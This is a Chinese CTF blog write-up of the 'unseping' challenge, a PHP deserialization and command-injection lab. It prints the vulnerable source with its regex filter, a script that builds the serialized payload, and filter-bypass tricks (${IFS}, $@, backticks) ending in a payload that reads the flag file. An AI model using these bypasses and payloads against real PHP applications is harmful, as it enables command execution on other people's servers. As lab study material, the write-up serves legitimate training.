unseping

最新推荐文章于 2024-07-24 21:07:42 发布
最新推荐文章于 2024-07-24 21:07:42 发布
阅读量647 收藏 21
点赞数 19
分类专栏: CTF web题目 文章标签: 安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_73399382/article/details/140439935
版权

nnnd,这道题谁标的难度1!参考文章:江苏工匠杯-unseping&序列化,正则绕过(全网最简单的wp)_江苏工匠杯unseping-CSDN博客

这是这道题的源码,一看exec和unserialize就是反序列化和命令执行,还有个正则应该还要绕过

<?php
highlight_file(__FILE__);

class ease{
    
    private $method;
    private $args;
    function __construct($method, $args) {
        $this->method = $method;
        $this->args = $args;
    }
 
    function __destruct(){
        if (in_array($this->method, array("ping"))) {
            call_user_func_array(array($this, $this->method), $this->args);
        }
    } 
 
    function ping($ip){
        exec($ip, $result);
        var_dump($result);
    }

    function waf($str){
        if (!preg_match_all("/(\||&|;| |\/|cat|flag|tac|php|ls)/", $str, $pat_array)) {
            return $str;
        } else {
            echo "don't hack";
        }
    }
 
    function __wakeup(){
        foreach($this->args as $k => $v) {
            $this->args[$k] = $this->waf($v);
        }
    }   
}

$ctf=@$_POST['ctf'];
@unserialize(base64_decode($ctf));
?>

简单讲一下call_user_func_array调用回调函数,大概就是这样,网上找的例子,本题中我猜测因为是在魔术方法里面,所以第一个参数array()里面类用伪变量$this替代了

(1)普通使用:

           function a($b, $c) {  

                echo $b; 

                echo $c; 

           } 

          call_user_func_array('a', array("111", "222")); 

          //输出 111 222

(2)调用类内部的方法:

         Class ClassA { 

                 function bc($b, $c) { 

                  $bc = $b + $c; 

                  echo $bc; 

                 } 

            } 

          call_user_func_array(array('ClassA','bc'), array("111", "222")); 

          //输出  333 

这个正则表达式解释如下

  • /: 正则表达式的开始和结束的分隔符。
  • (: 开始一个捕获组,用于将匹配的结果保存在结果数组中。
  • \|: 匹配一个垂直线字符"|"
  • |: 逻辑或操作符,用于匹配多个模式之一。
  • &: 匹配一个和字符"&"
  • ;: 匹配一个分号字符";"
  • : 匹配一个空格字符
  • \/: 匹配一个斜杠字符"/"
  • cat: 匹配字符串"cat"
  • flag: 匹配字符串"flag"
  • tac: 匹配字符串"tac"
  • php: 匹配字符串"php"
  • ls: 匹配字符串"ls"
  • ): 结束捕获组。
  • /: 正则表达式的结束符。

综上所述,该正则表达式将匹配字符串中的垂直线字符"|"、和字符"&"、分号字符";"、空格字符、斜杠字符"/",以及字符串"cat"、"flag"、"tac"、"php"、"ls"。

空格被过滤了,但是我们写命令的时候还需要空格,怎么办?

我只知道一个IFS空格,使用的时候写成${IFS}起到空格的作用。

上网查@是一个特殊变量,使用$@的形式起到空变量的作用,放在字符串中间绕过字符串过滤又不会对原字符串产生影响

魔术方法:

__construct() //创建对象时触发

__wakeup() //执行unserialize()时,先会调用这个函数

okk,到这里差不多读懂代码了,代码流程:将我们的base64编码并且序列化的数据经过post请求发送到PHP文件处理,代码首先接受数据然后base64解码反序列化,又因为wakeup这个魔术方法在反序列化前会被优先调用,所以执行wakeup方法:遍历关联数组args,将每个键对应的值用waf方法进行正则匹配,如果匹配通过后返回原字符串,否则打印hack,由此可以看出args存放的是系统命令这些。然后执行反序列化,对象被重新创建后无调用又被销毁,触发destruct魔术方法:in_array函数内容确定了method值为ping,然后call_user_func_array调用回调函数调用ping函数,将args数组内容作为ping函数的参数,然后exec执行系统命令,结果存到result,var_dump打印类型和值

上面的流程已经说的很详细了,我们先来试试水看看能不能执行命令

别忘了args是数组形式哦!

<?php
class ease
{

    private $method;
    private $args;

    function __construct($method, $args)
    {
        $this->method = $method;
        $this->args = $args;
    }
}
$object = new ease('ping',array('id'));
$ser = serialize($object);
$ser = base64_encode($ser);
echo $ser;
?>

成功执行id命令

接下来看看当前目录下的文件,args传入参数变为array('l$@s'),正则匹配会匹配整个l$@s,但是$@是空变量,最后解析出来还是ls

flag文件是数组的第一个元素

find 查看当前及子目录下的所有文件,我们可以使用cat 直接查看当前目录下的文件内容,不需要再编码来回转了

payload:

array('c$@at${IFS}`find`'),使用反引号是因为会优先执行反引号里面的命令

成功读出flag!不懂多看一下我写的流程思路就明白了

孤丞OVO
关注
  • 19
    点赞
  • 21
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
攻防世界unseping
qq_63761746的博客
03-20 854
攻防世界unseping详细解读
xctf unseping
qq_51796436的博客
12-16 193
php的payload如下:注意$printf后面接Tab,空格要被waf禁掉。
攻防世界-unseping
32bin的博客
10-28 1561
收藏 反馈 难度:1 方向:Web 题解数:1 解出人数:255 题目来源: 江苏工匠杯 题目描述: unseping 题目场景: http://61.147.171.105:62407 100% 倒计时: 3时17分40秒
【xctf之unseping
qq_40646572的博客
10-12 5089
这是一道,让我头皮发麻的题,前期感觉一般,后面感觉好像搞不定了。。。看了writeup才知道php还能这样用。。题目如上,一眼就可以看出这就是考察php的反序列化,感觉这不so easey?好像还真不是(菜鸡挠头)。首先就是正常的反序列化,在反序列化的时候首先触发__wakeup()函数,迭代args参数中的值进行过滤,解题的关键就是绕过这个过滤。可以看到,
微软蓝屏事件引发对构建更加稳固和安全的网络环境的思考
lupai的博客
07-24 410
综上所述,构建更加稳固和安全的网络环境需要政府、企业和用户共同努力,从政策、技术、用户行为等多个方面入手,形成全方位、多层次的网络安全防护体系。构建更加稳固和安全的网络环境是一个系统工程,需要从多个方面入手,包括政策、技术、用户行为等多个层面。建立完善的应急响应机制,制定应急预案和演练计划,提高应对网络攻击和突发事件的能力。鼓励和支持网络安全技术的研发和创新,推动新技术在网络安全领域的应用和推广。加强对用户的网络安全教育,提高用户的网络安全意识和防范能力。
大坝安全监测设备有哪些主要功能?
yyth13276363312的博客
07-24 283
12。3. **实时预警和报警处理**:提供精准的安全预警信息,及时处理可能的危险情况12。1. **实时监测大坝的各项物理参数**:包括应变、位移、水位、流量等12。6. **环境量监测**:包括上/下游水位、气温、降水量等11
网络战时代的国家安全:策略、技术和国际合作
2301_79955948的博客
07-24 1052
网络战时代的国家安全涉及到策略、技术和国际合作等多个方面。
内网安全:IPC横向
8888的博客
07-23 675
IPC是为了实现进程之间的通信而开放的管道。IPC可以通过验证用户名和密码来获取相应的权限。通过IPC可以与目标机器建立连接。
HDShredder 7 企业版案例分享: 依照国际权威标准,安全清除企业数据
sanyuan7783的博客
07-24 1104
符合国际权威标准软件操作符合多种主流国际权威标准,包括 DoD 5200, BSI, VSITR, NCSC, NIST 及 GOST,支持擦除单个分区和区域,并可自由定制擦除模式。对于“Clear”清除级别,软件操作符合 ISO 27001, DIN 66399 以及 NIST SP 800-88R1要求。对于“Purge”级别,则使用 SecureErase 功能。安全擦除证书软件生成准确的安全清除证书,包括时间戳、序列号、以及清除过程的所有细节信息。远程擦除 - 使用 NetDisk 技术。
深入探讨:如何在Shopee平台上安全运营多个店铺?
Ssm2022的博客
07-24 567
因为每个IP相关信息会被收录形成独特的浏览器指纹,浏览器指纹是一种通过收集和识别用户浏览器特征来跟踪和识别用户的技术。在跨境电商中,特别是运营多个店铺的商家,浏览器指纹可能被电商平台用于判断账号之间的关联。所以,当Shopee检测到一IP多店铺时,会认为商家存在恶意倾销等行为,从而封禁你的账号。这是一个关乎账号安全和业务持续性的重要问题。浏览器保存的账号、密码、支付信息等数据,以及注册资料、法人信息的重复使用,也可能导致账号被关联。通过这些措施,卖家可以有效降低店铺被关联的风险,保障业务的持续和稳定发展。
SPF配置教程:如何安全构建邮件发送策略?
danplus的博客
07-23 509
SPF配置教程旨在帮助您理解和实施SPF策略,以确保您的邮件通信更加安全和可靠。AokSend,SPF配置教程轻松学,结合API与SMTP,防止邮件伪造,提升邮件送达率!
充电桩浪涌保护方案—保障充电设施安全稳定运行的关键
最新发布
Leiditech_的博客
07-24 865
大功率TVS二极管则以其极快的响应速度(纳秒级)和精准的电压钳位能力,对残余的浪涌进行进一步抑制,确保后端电路的安全。然而,由于其复杂的电气环境和暴露于户外的特点,充电桩容易受到浪涌的影响。浪涌可能来自雷电、电网故障、大功率设备的启停等,对充电桩的电子设备和储能系统造成严重损害。它具有超强的浪涌吸收能力和抑制电压能力,在实际应用中通常并接在电路中,既能解决雷击大浪涌问题,又能对静电起到超强的防护效果。3. 设备启停:大功率设备(如电动机、变压器等)的启动和停止会引起线路中的电流和电压突变,产生浪涌。
S-HTTP协议:确保网络通信安全的重要基石
jiamisoft的博客
07-23 630
S-HTTP,全称为Secure Hypertext Transfer Protocol,是一种安全的超文本传输协议,最早于1994年提出,并在1995年正式发布。作为HTTP(Hypertext Transfer Protocol)的一个扩展,S-HTTP旨在通过网络通信提供加密和认证机制,确保数据传输过程中的安全性和完整性。每个S-HTTP文件都经过加密处理,或者包含数字验证,甚至两者兼备,这一特性使得S-HTTP成为需要高安全性数据传输场景下的理想选择。
KunDB4.0:安全能力与Oracle兼容性提升,支持跨系统多租户部署
Transwarp
07-24 340
Oracle集中式架构向KunDB分布式架构迁移过程中,KunDB支持透明的哈希重新分布,对业务透明,无需业务重写应用,并重新设置了业务规则对数据分片,提升并行的吞吐处理效率。同时,KunDB提供自研CDC工具,整个过程支持完全的可视化流程监督,数据和对象的校验工作量和时长大幅缩减。各个租户之间通过云原生的调度方式将数据调度到不同的硬件上,通过业务分时作业的方式分批进行使用,同时通过硬件的部署隔离来把租户资源隔离开,通过数据的隔离和单实例中不同租户使用不同硬件的方式,使其之间互不影响。
哪个邮箱最安全最好用啊
Zoho_Mail的博客
07-23 1099
Zoho企业邮箱,采用加密技术、反垃圾邮件和病毒保护,支持多因素认证,确保数据安全合规,同时提供易用性集成和移动应用。对公司,电子邮件可能带上商业计划、顾客信息、财务报表等保密信息,泄露可能导致竞争者掌握,危害企业的竞争优势与信誉。邮件炸弹进攻:很多垃圾短信的涌入可能导致邮箱服务器负荷,危害工作邮件的接收和推送,进而影响业务运作。登陆凭据、医疗记录、专利等敏感信息,一旦泄露,可能对个人或企业导致不可逆转的伤害。遵守国际安全标准和法规,如GDPR、HIPAA等,保证用户数据的合法处理和保护。
Internxt:适用于Linux开源安全云存储平台
ecscoupon的博客
07-24 1104
有无数的云存储平台为您的文件提供安全可靠的存储空间。可在 Linux 上安装的热门云存储应用程序包括Dropbox、Nextcloud和Google Drive,遗憾的是,后者迄今为止不提供 Linux 客户端。其他自托管选项包括OwnCloud、Pydio Cells、Seafile、Resilio和Syncthing。另一个值得尝试的开源云存储替代方案是Internxt。Internxt总部位于西班牙,是一家总部位于瓦伦西亚的初创公司,创始人为Fran Villalba Segarra。
叉车安全防撞系统有哪些?叉车防撞装置解决方案
jiuxindianzi的博客
07-24 338
叉车安全防撞系统保障工业物流安全,包括毫米波雷达、AI影像、UWB行人防撞系统,各具特色,能准确感知环境、及时反应,降低碰撞事故,提高安全性及工作效率。
等保测评与供应链安全:确保整个生态链的安全无虞
A526847的博客
07-24 577
通过关注第三方服务提供商的安全管理、建立全面的评估管理体系、实施动态防护机制、加强数据安全保护以及建立合规审计机制等措施,可以显著提升整个供应链的安全水平。以绿盟科技为例,该公司通过组织机构的供应链安全建设、对供应商的安全评估及检查、产品技术能力建设以及漏洞应急能力建设等多方面的努力,成功实现了供应链安全的全方位治理。等保测评是国家信息安全等级保护制度的重要组成部分,旨在通过科学的方法和标准,对信息系统的安全保护状况进行评估,确保信息系统达到相应的安全保护等级要求。
攻防世界 unseping
10-20
攻防世界Wire1杂项题目中的unseping是一个反序列化漏洞利用题目。在这个题目中,用户可以通过POST请求传递一个经过base64编码和序列化的数据,然后在服务器端进行反序列化操作。攻击者可以构造一个恶意的序列化数据,使得服务器在反序列化时执行恶意代码,从而达到攻击的目的。在这个题目中,攻击者构造了一个类对象,其中包含了一个ping方法,该方法可以执行ping命令。攻击者通过构造恶意参数,使得服务器在执行ping命令时执行了恶意代码,从而达到攻击的目的。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值